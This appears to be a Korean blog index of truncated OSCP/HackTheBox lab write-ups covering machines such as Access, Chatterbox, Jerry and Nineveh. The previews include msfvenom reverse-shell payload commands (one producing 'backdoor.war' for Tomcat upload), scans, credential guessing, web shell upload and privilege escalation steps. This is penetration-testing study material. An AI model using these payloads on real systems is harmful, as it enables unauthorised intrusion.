OSCP/HackTheBox 26

[Windows] Access

Access- MS Access DB읽어오는 방법- tool설치하거나 칼리에 있는거 사용하거나- 파워쉘 막혔을떄 어떻게 할지, StoredCredentials root@kali:/HTB/Access# ftpftp> binaryftp> get backup.mdbftp> get "Access Control.zip" * wget을 사용해서 ftp 익명유저로 다운로드 가능함, 이방법이 ftp접근해서 get하는 것보다 편리함wget -m ftp://anonymos:anonymous@10.10.10.98wget -m --no-passive ftp://anonymos:anonymous@10.10.10.98 root@kali:/HTB/Access# file backup.mdbroot@kali:/HTB/Access# s..

OSCP/HackTheBox 2020.09.26

[Windows] Chatterbox

Chatterbox- Exploit POC 스크립트를 수정하는 법을 알아야함- 파워쉘 명령어에 익숙해야함 Achat.exe에 대한 exploit이 존재함=> 페이로드 poc가 cmd 실행으로 되어있어서 리버스 쉘 옵션으로 교체함그 외 배드캐릭터 옵션과 인코딩 등 다른 옵션들은 그대로 사용 msfvenom -a x86 platform windows -p windows/shell_reverse_tcplhost=... lport=... -e x86/unicode_mixed -b "\x00...." BufferRegister=EAX -f python 완성된 쉘코드를 파이썬 스크립트 상에서 교체 후 타겟 IP와 포트 확인 후 변경하여 Exploit +POC 분석에 대하여 1152 - len(Payload)이 코드..

OSCP/HackTheBox 2020.09.24

[Windows] Jerry

Jerry 배운점- 디폴트페이지 접근- msfvenom .war 타입 쉘 지원 1. tomcat 메니저 페이지 접근 후 디폴트 credential 입력 /manager/html 2. msfvenom으로 jsp/war 타입 리버스쉘 페이로드 생성하여 업로드msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.xx.xx LPORT=4449 -f war > backdoor.war 잘못된 점- msfvenom에서 war타입 리버스 쉘을 제공하는지 모르고 빙빙돌아감 1. 칼리에 존재하는 jsp 웹쉘 war파일을 올린 후 msfvenom으로 tcp리버스 쉘 생성하여 업로드 2. jsp웹쉘에 접근, 파워쉘로 venom 페이로드 다운로드 받았지만 exe파일 실행이 안되서 망함. 3..

OSCP/HackTheBox 2020.09.24

[Linux] SwagShop

SwagShop - 가혹하지만 꼭 풀어보아야하는 문제.- sudo에 대해 잘 이해하고 있는가?- Exploit 디버깅해서 스크립트 수정할 수 있는가?- 스크립트 파일에 대한 설명, 주석에 대해 이해하였는가?- Exploit-DB에 등록된 스크립트는 완벽하지 않다.오래전에 올라온 스크립트라 라이브러리의 EOL같은 문제로 실행이 안될 수 도 있고...실행중인 서비스가 제작자에 의해 커스터마이징되어 특히 경로 부분이 수정될 수 있다.따라서, 이런 부분을 수정해줘야 한다. 디버깅하는 훈련이 필요하다. WriteUphttps://initinfosec.com/writeups/htb/2020/02/01/swagshop-htb-writeup/ 이니셜 쉘 nmap 결과 80포트가 오픈 됨magento 프레임워크를 사용하..

OSCP/HackTheBox 2020.09.18

[Linux] Irked

Irked - 어렵지 않은 난이도, 좋은 문제라고 생각함.- 1차 시험떄 느꼈지만, 구글링이 필요한 문제를 낸다. 이런 유형의 문제는 시험에 나올 가능성이 높다고 본다.- 구글링 후 추가적인 Software를 설치하는 것을 예상하지 못하면 시험 때, 당황 할 수 있다. Nmap 22...80...111.. rpcbind6697.. ircs-u8067...56813..65534... Enumeration IRC 관련 포트가 열려 있다. 웹 서버에 접속하였을때도 이미지명에 irc가 포함되어 있다.rpc 관련 문제같아서 Enumeration 후 관련 포트 연결을 시도해 봤으나 모두 실패.NC로 접속하여도 핵심 단서를 얻을 수 없었다, 그런데 접근 실패 매세지가 발생하여 혹시 다른 방벙으로 접속이 가능한지 생각..

OSCP/HackTheBox 2020.09.16

[Linux] October

October- OSCP 범위를 벗어난 문제 1. October CMS- 버전에 해당하는 exploit 취약점 있는가?- admin 구글링, 브루트포스- 디폴트 패스워드 시도 2. 권한상승- Smash the Stack 버퍼오버플로우, NX/DEP,ASLR 보안 플래그가 존재함- 범위를 벗어나므로 진행 Xhttps://www.hackingdream.net/2019/08/hackthebox-october-walkthrough.html 기타 정리 1. passwd에 등록된 사용자와 동일한 계정의 해쉬가 존재하는가?WEB폴더 -> DB.php -> 데이터베이스 계정 정보-> mysql 접근 -> 유저hash 획득 -> 존더리퍼 -> 동일한 비밀번호로 SSH 또는 su 접근 시도 2. DB서버가 root사용자에..

OSCP/HackTheBox 2020.09.16

[Linux] Nineveh

HTBNineveh: 난이도 쌉쌉어려움 1. 웹퍼징할 때, common.txt에 없는 리스트 시도해봐야 함...2. HOST로 지정된 주소와 IP로 접근하는 방식에 차이가 있었음. vhost 지정때문에 접근이 안되기도함3. 히드라 사용할때 http,https 등 IP(host)주소에 프로토콜을 넣으면 안됨. (Https 브루트포스 지원함, 비밀번호만 공격시 아이디는 아무값 넣어주면됨)4. searchsploit에 취약점이 나오지만 보안약점이 수정된 래빗홀(phpliteadmin) 일 수 있다. - 여러번 해봐도 잘 안된다면 다른 방법과 길이 없는지 생각해봐야 함 - 또한 특정 행위, 예를 들어 업로드까지 가능하다면 다른 취약점 백터와 연계될 수 있음을 생각해봐야한다. - 파일 업로드가 되고 경로까지 알 ..

OSCP/HackTheBox 2020.09.14

[Linux] Valentine

허트블리드를 전혀 예상하지 못 했기 때문에 어려웠다. 또한 ssh 키파일의 유저가 누군지 알아차리기 힘들었는데 이부분을 제외하면 머신 구성은 제법 괜찮아 보인다. 문제 풀이nmap 스캔시 별다른건 없었고 ssh 버전이 낮은 것이 눈에 띄었다.다만, searchsploit으로 검색해도 별건 안나와서 넘어갔던게 화근이였던 것 같다.정보 수집시 구글링도 반드시 같이하자. 허트블리드는 nmap 스크립트도 지원한다.nmap -p 443 --script ssl-heartbleed 서치스플로잇searchsploit heartbleed32745.py nmap 풀포트스캔 팁nmap -vvv -sT -p- --min-rate 5000 --max-retries 1 -oN alltcp 10.10.10.79grep -v -e ..

OSCP/HackTheBox 2020.09.08

[Linux] Haircut

웹 브루트포싱 gobuster vs dirb vs wfuzz 웹은 높은 확률로 php언어가 나오므로 확장자 추가 체크해주자 dirb 아이피 -X .php 웹 쉘이 업로드되는 위치는 어디인가? => 이것 또한 퍼징으로 알아낼 수 있다. => /uploads : 403 Forbbiden nc쉘 => tty쉘 업그레이드 (완전한 쉘 아님): 웹쉘은 가상쉘이 아니기 때문에 sudo, su가 불가능함 /bin/bash -i 루트 권한상승 스크립트를 돌리면 수상한 setuid 파일을 찾을 수 있다. searchsploit을 검색하여 exploit을 찾을 수 있다. exploit은 쉘 파일 형태로 작성 되었으며 자동으로 컴파일 후 실행하게끔 작성되어 있다. 문제는 타겟 서버에 쉘 파일 실행시 에러가 발생한다는 것이다..

OSCP/HackTheBox 2020.09.07